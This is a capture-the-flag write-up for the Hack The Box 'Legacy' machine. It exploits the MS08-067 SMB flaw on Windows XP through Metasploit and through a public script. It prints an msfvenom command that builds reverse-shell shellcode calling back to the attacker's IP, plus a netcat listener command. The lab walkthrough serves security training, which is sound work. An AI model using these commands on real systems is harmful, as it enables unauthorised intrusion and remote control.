💻 Legacy – Writeup


We’ll use a very famous CVE vulnerability to exploit this machine.

Add the IP address in /etc/hosts:

...
10.10.10.4     legacy.htb
...

First, run an nmap scan:

Only two ports seem interesting: 139 and 445, which are the SMB ports.

We can run some enumeration on them:

We got some data, but nothing really useful.
smbclient doesn't return anything when we try to list the shares.

The only remaining lead is the OS version, which appears to be Windows XP, a very old release.
There should be a known exploit for it:

MS08-067 is a good candidate and is directly integrated into Metasploit. Let's try it:

Check the module options to see what needs to be set:

Run the exploit:

We are now Administrator of the machine!

Here is the other way to hack the box (:p), without Metasploit.

Download the script from https://github.com/andyacer/ms08_067
Then generate shellcode for our IP address and the port we want to receive the callback on:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=1337 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

The only fields you need to change here are LHOST and LPORT.
It will generate the shellcode as a C-style `unsigned char buf[]` array of escaped bytes.


Take only the quoted strings (not the `unsigned char buf[] =` declaration), open the file ms08_067_2018.py and replace the payload at line 44 with the one we just generated:

Set up a listener with netcat to catch the reverse shell:

nc -lnvp 1337

Don't forget to change the port to match the LPORT you set with msfvenom.

We can now run the exploit:

  • 10.10.10.4: this is the target
  • 6: tells the script to run the exploit with the target profile for Windows XP SP3 English. You can try the other ones, but if it fails you must restart the box, because a failed attempt breaks the SMB service.
  • 445: SMB port to target

We got our shell and we can retrieve the user and administrator flags!
